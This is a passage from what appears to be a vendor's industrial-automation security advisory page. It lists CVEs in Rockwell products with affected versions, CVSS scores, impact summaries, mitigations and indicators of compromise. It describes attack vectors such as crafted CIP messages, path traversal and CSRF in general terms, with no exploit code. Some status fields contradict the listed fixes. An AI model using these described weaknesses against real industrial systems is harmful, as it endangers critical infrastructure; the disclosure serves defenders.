Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.


If customers are unable to update to v5.20, please follow the instructions below to disable the vulnerability in v5.17.

  1. Open the web.xml file in your Pavilion8® installation folder set during installation and go to Console\container\webapps\ROOT\WEB-INF, by default this would be under C:\Pavilion\Console\container\webapps\ROOT\WEB-INF.
  2. Search for the text jmx-console-action-handler and delete the below lines from web.xml file:

      <servlet>
        <servlet-name>jmx-console-action-handler</servlet-name>
        <servlet-class>com.pav.jboss.jmx.HtmlAdaptorServlet</servlet-class>
      </servlet>
      <servlet-mapping>
        <servlet-name>jmx-console-action-handler</servlet-name>
        <url-pattern>/jmx-console/HtmlAdaptor</url-pattern>
      </servlet-mapping>
     
  3. Save the changes and close the file.
  4. Restart Pavilion8® Console Service.
  5. Logout and log back into the console and navigate to the URL http:// <FQDN>/jmx-console to confirm you are getting the error message HTTP Status 404 – Not Found.

Note: <FQDN> is your fully qualified domain name used for the Console login.

Additional Resources

High
PN1639 | PN1639 | Select Distributed I/O Communication Modules vulnerable to a Denial-of-Service Vulnerability
Published Date:
August 23, 2023
Last Updated:
August 23, 2023
CVE IDs:
CVE-2022-1737
Products:
1732E-OB16M12DR Series B, 1732E-IB16M12R Series B, 1734-AENTR , 1732E-OB16M12R Series B, 1732E-IB16M12DR Series B, 1732E-8X8M12DR Series B, 1738-AENTR Series A , 1732E-12X4M12P5QCDR Series A, 1732E-12X4M12QCDR Series A, 1732E-16CFGM12QCR Series A, 1734-AENT, 1732E-12X4M12QCDR Series A, 1732E-16CFGM12P5QCR Series A, 1732E-16CFGM12R Series B, 1799ER-IQ10XOQ10 Series B, 1732E-16CFGM12P5QCWR Series B, 1732E-16CFGM12QCWR Series A
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – August 23, 2023

Affected Products

Affected Product First Known in Firmware Version Corrected in Firmware Version
1734-AENT/1734-AENTR Series C <=7.011 7.013
1734-AENT/1734-AENTR Series B <=5.019 5.021
1738-AENT/ 1738-AENTR Series B <=6.011 6.013
1794-AENTR Series A <=2.011 2.012
1732E-16CFGM12QCWR Series A <=3.011 3.012
1732E-12X4M12QCDR Series A <=3.011 3.012
1732E-16CFGM12QCR Series A <=3.011 3.012
1732E-16CFGM12P5QCR Series A <=3.011 3.012
1732E-12X4M12P5QCDR Series A <=3.011 3.012
1732E-16CFGM12P5QCWR Series B <=3.011 3.012
1732E-IB16M12R Series B <=3.011 3.012
1732E-OB16M12R Series B <=3.011 3.012
1732E-16CFGM12R Series B <=3.011 3.012
1732E-IB16M12DR Series B <=3.011 3.012
1732E-OB16M12DR Series B <=3.011 3.012
1732E-8X8M12DR Series B <=3.011 3.012
1799ER-IQ10XOQ10 Series B <=3.011 3.012

Vulnerability Details

This issue was reported to Rockwell Automation by the Cybersecurity and Infrastructure Security Agency.  The affected devices utilize the Pyramid Solutions EtherNet/IP Adapter kit and are could potentially be affected by the vulnerability.

CVE-2022-1737 IMPACT
Pyramid Solutions' affected products, the Developer and DLL kits for EtherNet/IP Adapter and EtherNet/IP Scanner may be vulnerable to an out-of-bounds write, which may allow an unauthorized threat actor to send a specially crafted packet that may result in a denial-of-service condition.

CVSS Base Score: 8.6
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
CWE: CWE-787 Out-of-Bounds Write

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations below, if possible. Additionally, we encourage our customers to implement our suggested security best practices to minimize the risk of vulnerability.

Additional Resources

Critical
PN1638 | PN1638 | ThinManager® ThinServer™ Input Validation Vulnerabilities
Published Date:
August 17, 2023
Last Updated:
August 17, 2023
CVE IDs:
CVE-2023-2917, CVE-2023-2914, CVE-2023-2915
Products:
ThinManager ThinServer Input Validation Vulnerabilities
CVSS Scores:
7.5, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – August 17, 2023

Affected Products

Affected Product Vulnerability First Known in Software Versions Corrected in Software Versions
ThinManager® ThinServer™
  • CVE-2023-2914
  • CVE-2023-2915
  • CVE-2023-2917
  • 11.0.0-11.2.6
  • 11.1.0-11.1.6
  • 11.2.0-11.2.6
  • 12.0.0-12.0.5
  • 12.1.0-12.1.6
  • 13.0.0-13.0.2
  • 13.1.0

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. This vulnerability was discovered and reported to Rockwell Automation by security researchers at Tenable Network Security.

CVE-2023-2914 IMPACT
Due to improper input validation, an integer overflow condition exists in the affected products. When the ThinManager processes incoming messages, a read access violation occurs and terminates the process. A malicious user could exploit this vulnerability by sending a crafted synchronization protocol message.

CVSS Base Score: 7.5/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: 20 Improper Input Validation

CVE-2023-2915 IMPACT
Due to improper input validation, a path traversal vulnerability exists when the ThinManager processes a certain function. If exploited, an unauthenticated remote threat actor can delete arbitrary files with system privileges.   A malicious user could exploit this vulnerability by sending a specifically crafted synchronization protocol message.

CVSS Base Score: 7.5/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: 20 Improper Input Validation

CVE-2023-2917 IMPACT
Due to improper input validation, a path traversal vulnerability exists, via the file name field, when the ThinManager processes a certain function. If exploited, an unauthenticated remote attacker can upload arbitrary files to any directory on the disk drive where ThinServer.exe is installed.  A malicious user could exploit this vulnerability by sending a crafted synchronization protocol message.

CVSS Base Score: 9.8/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: 20 Improper Input Validation

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Additional Resources

High
PN1637 | PN1637 | Armor ™ PowerFlex ® Critical Fault Vulnerability
Published Date:
August 08, 2023
Last Updated:
August 08, 2023
CVE IDs:
CVE-2023-2423
Products:
Armor PowerFlex Critical Fault
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – August 8, 2023

Affected Products

Affected Product First Known in Firmware Revision Corrected in Firmware Revision
Armor™ PowerFlex® 1.003 2.001 or later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-2423 IMPACT
A vulnerability was discovered in Armor™ PowerFlex® when the product sends communications to the local event log. Threat actors could exploit this vulnerability by sending an influx of network commands, causing the product to generate an influx of event log traffic at a high rate. If exploited, the product would stop normal operations and self-reset. The error code would need to be cleared prior to resuming normal operations.

CVSS Base Score: 8.6
CVSS Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE- 682 Incorrect Calculation

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate environment specific prioritization.

Risk Mitigation & User Action

Customers using the affected versions are encouraged to apply the below risk mitigations and implement our suggested security best practices to minimize risk of this vulnerability in their environments.

Additional Resources

High
PN1634 | PN1634 | Kinetix® 5700 DC Bus Power Supply Series A – CIP Message Attack Could Cause Denial-Of-Service
Published Date:
July 18, 2023
Last Updated:
July 18, 2023
CVE IDs:
CVE-2023-2263
Products:
2198 Kinetix 5700 Drive
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – July 18, 2023

Affected Products

Affected Product First Known in Firmware Revision Corrected in Firmware Revision
Kinetix® 5700 DC Bus Power Supply – Series A V13.001 V13.003

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.  The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-2263 IMPACT
The Kinetix 5700  DC Bus Power Supply Series A is vulnerable to CIP fuzzing.  The new ENIP   connections cannot be established if impacted by this vulnerability,  which prohibits operational capabilities of the device resulting in a denial-of-service attack.

CVSS Base Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-400: Uncontrolled Resource Consumption

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations below, if possible.

Additional Resources

High
PN1635 | PN1635 | ThinManager® ThinServer™ Path Traversal Vulnerability
Published Date:
July 18, 2023
Last Updated:
July 18, 2023
CVE IDs:
CVE-2023-2913
Products:
ThinManager
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – July 18, 2023

Affected Products

Affected Product First Known in software version Corrected in software version
ThinManager® ThinServer™
  • 13.0.0 - 13.0.2
  • 13.1.0
  • 13.0.3 or later
  • 13.1.1 or later

Vulnerability Details

A vulnerability was discovered by Security Researchers at Flashpoint.io and reported to Rockwell Automation. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-2913 IMPACT
An executable used in the affected products can be configured to enable an API feature in the HTTPS Server Settings. This feature is disabled by default. When the API is enabled and handling requests, a path traversal vulnerability exists that allows a remote actor to leverage the privileges of the server’s file system and read arbitrary files stored in it. A malicious user could exploit this vulnerability by executing a path that contains manipulating variables.

CVSS Base Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE-23 Relative Path Traversal

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the potential risk of vulnerability.

Additional Resources

High
PN1633 | PN1633 | Remote Code Execution and Denial-of-Service Vulnerabilities in Select Communication Modules
Published Date:
July 12, 2023
Last Updated:
July 12, 2023
CVE IDs:
CVE-2023-3596, CVE-2023-3595
Products:
Comms Modules
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – July 12, 2023

Executive Summary

Rockwell Automation, in coordination with the U.S. government, has analyzed a novel exploit capability attributed to Advance Persistent Threat (APT) actors affecting select communication modules. We are not aware of current exploitation leveraging this capability, and intended victimization remains unclear. Previous threat actors cyberactivity involving industrial systems suggests a high likelihood that these capabilities were developed with an intent to target critical infrastructure and that victim scope could include international customers. Threat activity is subject to change and customers using affected products could face serious risk if exposed.

Rockwell Automation has provided patches for all affected products, including hardware series that were out of support. Detection rules have also been provided.

Exploitation of these vulnerabilities could allow malicious actors to gain remote access of the running memory of the module and perform malicious activity, such as manipulating the module’s firmware, inserting new functionality into the module, wiping the module’s memory, falsifying traffic to/from the module, establishing persistence on the module, and potentially affect the underlying industrial process. This could result in destructive actions where vulnerable modules are installed, including critical infrastructure.

Customers using the affected products are strongly encouraged to evaluate and implement the mitigations provided below. Additional details relating to the discovered vulnerabilities, including the products in scope, impact, and recommended countermeasures, are provided below.

Affected Products

Catalog Series Versions
1756-EN2T
1756-EN2TK
1756-EN2TXT		 A,B,C <=5.008 & 5.028
D <=11.003
1756-EN2TP
1756-EN2TPK
1756-EN2TPXT		 A <=11.003
1756-EN2TR
1756-EN2TRK
1756-EN2TRXT		 A, B <=5.008 & 5.028
C <=11.003
1756-EN2F
1756-EN2FK		 A, B <=5.008 & 5.028
C <=11.003
1756-EN3TR
1756-EN3TRK		 A <=5.008 & 5.028
B <=11.003
1756-EN4TR
1756-EN4TRK
1756-EN4TRXT		 A <=5.001

Vulnerability Details

CVE-2023-3595
Where this vulnerability exists in the 1756 EN2* and 1756 EN3* products, it could allow a malicious user to perform remote code execution with persistence on the target system through maliciously crafted CIP messages. This includes the ability to modify, deny, and exfiltrate data passing through the device.

CVSS score: 9.8/10 (Critical)
CVSS vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787: Out-of-bounds Write

CVE-2023-3596
Where this vulnerability exists in the 1756-EN4* products, it could allow a malicious user to cause a denial of service by asserting the target system through maliciously crafted CIP messages.

CVSS Score: 7.5/10 (High)
CVSS vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-787: Out-of-bounds Write

Risk Mitigation & User Action

These vulnerabilities can be addressed by performing a standard firmware update. Customers are strongly encouraged to implement the risk mitigations provided below and to the extent possible, to combine these with the QA43240 - Recommended Security Guidelines from Rockwell Automation to employ multiple strategies simultaneously.
Catalog Series Affected Versions Remediations
1756-EN2T
1756-EN2TK
1756-EN2TXT		 A,B,C <=5.008 & 5.028
  • Update to 5.029 or later for signed versions (**recommended).
  • Update to 5.009 for unsigned versions.
D <=11.003 Update to 11.004 or later
1756-EN2TP
1756-EN2TPK
1756-EN2TPXT		 A <=11.003 Update to 11.004 or later
1756-EN2TR
1756-EN2TRK
1756-EN2TRXT		 A, B <=5.008 & 5.028
  • Update to 5.029 or later for signed versions (**recommended).
  • Update to 5.009 for unsigned versions.
C <=11.003 Update to 11.004 or later
1756-EN2F
1756-EN2FK		 A, B <=5.008 & 5.028
  • Update to 5.029 or later for signed versions (**recommended).
  • Update to 5.009 for unsigned versions.
C <=11.003 Update to 11.004 or later
1756-EN3TR
1756-EN3TRK		 A <=5.008 & 5.028
  • Update to 5.029 or later for signed versions (**recommended).
  • Update to 5.009 for unsigned versions.
B <=11.003 Update to 11.004 or later
1756-EN4TR
1756-EN4TRK
1756-EN4TRXT		 A <=5.001 Update to 5.002 or later
** Rockwell Automation strongly recommends updating to signed firmware if possible. Once the module is updated to signed firmware (example 5.008 to 5.029), it is not possible to revert to unsigned firmware versions.

Mitigations

Organizations should take the following actions to further secure ControlLogix communications modules from exploitation.
  • Update firmware. Update EN2* ControlLogix communications modules to firmware revision 11.004 and update EN4* ControlLogix communications modules to firmware revision 5.002.
  • Properly segment networks. Given a cyber actor would require network connectivity to the communication module to exploit the vulnerability, organizations should ensure ICS/SCADA networks are properly segmented within the process structure as well as from the Internet and other non-essential networks.
  • Implement detection signatures. Use appended Snort signatures to monitor and detect anomalous Common Industrial Protocol (CIP) packets to Rockwell Automation devices.
Additionally, organizations should increase protections of ICS/SCADA networks by implementing at least the following mitigations:
  • Regularly back up devices to allow for reversion to a clean copy of firmware or a working project;
  • disable unused CIP objects on communications modules, such as unused CIP Email and Socket Objects;
  • block all traffic to CIP-enabled devices from outside the ICS/SCADA network using available security products; and
  • monitor CIP traffic for unexpected content or unusual packets lengths.

Potential Indicators of Compromise

System owners should ensure ICS/SCADA networks are baselined and regularly monitored for deviations in network activity. Specifically, systems owners can look for the following potential IOCs (Indicators of Compromise) for ControlLogix communications modules:
  • Unknown scanning on a network for Common Industrial Protocol (CIP)-enabled devices.
  • Unexpected or out-of-specification CIP packets to CIP objects implemented in ControlLogix communications modules, including the Email Object and non-public vendor-specified objects.
  • Arbitrary writes to communication module memory or firmware.
  • Unexpected firmware updates.
  • Unexpected disabling of secure boot options.
  • Uncommon firmware file names.

Detection Rules

The following Snort rules are intended to be run on a computer with network visibility of a ControlLogix communications module and can be used to detect traffic to a ControlLogix communications module that does not conform to the CIP specification as provided by ODVA (Open DeviceNet Vendors Association). While both the CIP Email and Socket Objects are capable of communicating over a network, they are intended to communicate over the backplane of a ControlLogix PLC (Programmable Logic Controller) and therefore should not be seen over the network. However, it is possible that site engineers could configure a communications module such that there is legitimate network traffic to and from CIP Email and Socket Objects, potentially resulting in false positives.

Snort 2 Rules and Snort 3 Rules are both attached below.

References

Attachments
Attachments

Critical
PN1630 | PN1630 | Enhanced HIM Vulnerable to Cross Site Request Forgery Attack
Published Date:
July 11, 2023
Last Updated:
July 11, 2023
CVE IDs:
CVE-2023-2746
Products:
PowerFlex 7000, PowerFlex 6000
CVSS Scores:
9.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - July 11, 2023

Affected Products

Affected Product First Known in Firmware Revision Corrected in Firmware Revision
Enhanced HIM v1.001 v1.002

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.  The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-2746 IMPACT
The API that the application uses is not protected sufficiently and uses incorrect Cross-Origin Resource Sharing (CORS) settings and, as a result, is vulnerable to a Cross Site Request Forgery (CSRF) attack. To exploit this vulnerability, a malicious user would have to convince a user to click on an untrusted link through a social engineering attack or successfully perform a Cross Site Scripting Attack (XSS). Exploitation of a CSRF could potentially lead to sensitive information disclosure and full remote access to the affected products.

CVSS Base Score: 9.6/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CWE: CWE-352: Cross-Site Request Forgery (CSRF)

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply risk mitigation, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the potential risk of the vulnerability.

Additional Resources

High
PN1631 | PN1631 | PowerMonitor™ 1000 – Cross-Site Scripting Vulnerability
Published Date:
July 11, 2023
Last Updated:
July 11, 2023
CVE IDs:
CVE-2023-2072
Products:
1408 PowerMonitor 1000
CVSS Scores:
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – July 11, 2023

Affected Products

Affected Product (automated) First Known in Software Revision Corrected in Software Revision
PowerMonitor™ 1000 V4.011 V4.019

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.  The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-2072 IMPACT
The PowerMonitor 1000 contains stored cross site scripting vulnerabilities within the web page of the product.  The vulnerable pages do not require privileges to access and can be injected with code by an attacker which could be used to leverage an attack on an authenticated user resulting in remote code execution and potentially the complete loss of confidentiality, integrity, and availability of the product.

CVSS Base Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-787 Out-Of-Bounds Write

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigation below, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the potential risk of the vulnerability.

Additional Resources

High
PN1627 | PN1627 | FactoryTalk® System Services affecting FactoryTalk® Policy Manager – Multiple Vulnerabilities
Published Date:
June 13, 2023
Last Updated:
June 13, 2023
CVE IDs:
CVE-2023-2639, CVE-2023-2637, CVE-2023-2638
Products:
FactoryTalk Policy Manager, FactoryTalk System Services, FactoryTalk Services Platform
CVSS Scores:
4.1, 5.9, 7.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - June 13, 2023

Affected Products

Affected Product (automated) First Known in Software Version Corrected in Software Version
FactoryTalk® Services Platform
* Only if the following were installed:
  • FactoryTalk® Policy Manager v6.11.0
  • FactoryTalk® System Services v6.11.0
 6.11.00 6.30.00

Vulnerability Details

Rockwell Automation received a report from Claroty regarding three vulnerabilities in FactoryTalk® System Services. If successfully exploited, these vulnerabilities may result in information disclosure, loading of malicious configuration files, or the elevation of privileges from a user to an administrator.

FactoryTalk® Policy Manager is dependent upon FactoryTalk® System Services and both components must be installed together. Rockwell Automation used the latest version  of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-2637  IMPACT
Hard-coded cryptographic key may lead to privilege escalation. FactoryTalk® System Services uses a hard-coded cryptographic key to generate administrator cookies. This vulnerability may allow a local, authenticated non-admin user to generate an invalid administrator cookie giving them administrative privileges to the FactoryTalk® Policy Manger database. This may allow the threat actor to make malicious changes to the database that will be deployed when a legitimate FactoryTalk® Policy Manager user deploys a security policy model. User interaction is required for this vulnerability to be successfully exploited.

CVSS Base Score: 7.3
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:H.
CWE: CWE-321: Use of Hard-coded Cryptographic Key

Known Exploited Vulnerability (KEV) database: No

CVE-2023-2638  IMPACT
Improper authorization in FTSSBackupRestore.exe may lead to the loading of malicious configuration archives. FactoryTalk® System Services does not verify that a backup configuration archive is password protected. This vulnerability may allow a local, authenticated non-admin user to craft a malicious backup archive, without password protection, that will be loaded by FactoryTalk® System Services as a valid backup when a restore procedure takes places. User interaction is required for this vulnerability to be successfully exploited.

CVSS Base Score: 5.9
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H
CWE: CWE-287: Improper Authentication

Known Exploited Vulnerability (KEV) database: No

CVE-2023-2639  IMPACT
Origin validation error may lead to information disclosure. The underlying feedback mechanism of FactoryTalk® System Services that transfers the FactoryTalk® Policy Manager rules to relevant devices on the network does not verify that the origin of the communication is from a legitimate local client device. This may allow a threat actor to craft a malicious website that, when visited, will send a malicious script that can connect to the local WebSocket endpoint and wait for events as if it was a valid client device. If successfully exploited, this would allow a threat actor to receive information including whether FactoryTalk® Policy Manager is installed and potentially the entire security policy. User interaction is required for this vulnerability to be successfully exploited.

CVSS Base Score: 4.1
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N
CWE: CWE-346: Origin Validation Error

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

Additional Resources

CVE-2023-2637 JSON
CVE-2023-2638 JSON
CVE-2023-2639 JSON

High
PN1628 | PN1628 | Apache Portable Runtime Vulnerability in FactoryTalk® Edge Gateway
Published Date:
June 13, 2023
Last Updated:
June 13, 2023
CVE IDs:
CVE-2021-35940, CVE-2017-12613
Products:
FactoryTalk Edge Gateway
CVSS Scores:
7.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - June 13, 2023

Affected Products

Affected Product First Known in Software Version Corrected in Software Version
FactoryTalk® Edge Gateway v1.03.00 v1.04.00

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.  The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2021-35940 IMPACT
An out of bounds array read vulnerability was fixed in the apr_time_exp*() function in the Apache Portable Runtime v1.6.3 (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue.

CVSS Base Score: 7.1
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
CWE: CWE 125 Out-of-bounds Read

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigation below, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Additional Resources

High
PN1629 | PN1629 | Denial-of-Service Vulnerability in FactoryTalk® Transaction Manager
Published Date:
June 13, 2023
Last Updated:
June 13, 2023
CVE IDs:
CVE-2023-2778
Products:
FactoryTalk Transaction Manager
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - June 13, 2023

Affected Products

Affected Product First Known in Software Version Corrected in Software Version
FactoryTalk® Transaction Manager <=v13.10 BF29042 - Patch: Multiple issues, FactoryTalk Transaction Manager 13.00/13.10

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-2778 IMPACT
A denial-of-service (DoS) vulnerability exists in the affected products. This vulnerability can be exploited by sending a modified packet to port 400. If exploited, the application could potentially crash or experience a high CPU or memory usage condition, causing intermittent application functionality issues. The application would need to be restarted to recover from the DoS.

CVSS Base Score 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-400 Uncontrolled Resource Consumption

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations below, if possible. Additionally, we encourage our customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Additional Resources

High
PN1625 | PN1625 | Inadequate Encryption Vulnerability in ThinManager®
Published Date:
May 12, 2023
Last Updated:
May 12, 2023
CVE IDs:
CVE-2023-2443
Products:
ThinManager
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
2.0
Revision History
Version 1.0 - May 11, 2023
Version 2.0 - May 12, 2023 – Updated First Known in Software Version

Affected Products

Affected Product First Known in Software Version Corrected in Software Version
ThinManager ® v13.0.0 and v13.0.1 v13.0.2

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-2443 IMPACT
The affected product allows use of medium strength ciphers.  If the client requests an insecure cipher, a malicious actor could potentially decrypt traffic sent between the client and server API.

CVSS Base Score: 7.5/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: Inadequate Encryption Strength

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize risk of vulnerability.

Additional Resources

High
PN1622 | PN1622 | ArmorStart® ST 281E, 284EE Vulnerable to Multiple XSS Vulnerabilities
Published Date:
May 11, 2023
Last Updated:
May 11, 2023
CVE IDs:
CVE-2023-29030, CVE-2023-29022, CVE-2023-29028, CVE-2023-29027, CVE-2023-29023, CVE-2023-29026, CVE-2023-29029, CVE-2023-29031, CVE-2023-29024, CVE-2023-29025
Products:
ArmorStart
CVSS Scores:
4.7, 7.0, 5.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - May 11, 2023

Affected Products

Affected Product (automated) First Known in Firmware Revision Corrected in Firmware Revision
ArmorStart® ST 281E v2.004.06 N/A
ArmorStart® ST 284E all N/A
ArmorStart® ST 280E all N/A

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-29031 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful exploitation of this vulnerability.

CVSS Base Score: 7.0
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-20 Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

CVE-2023-29030 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful exploitation of this vulnerability.

CVSS Base Score: 7.0 (High)
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-20 Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

CVE-2023-29023 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful exploitation of this vulnerability.

CVSS Base Score: 7.0 (High)
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-20 Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

CVE-2023-29024 IMPACT
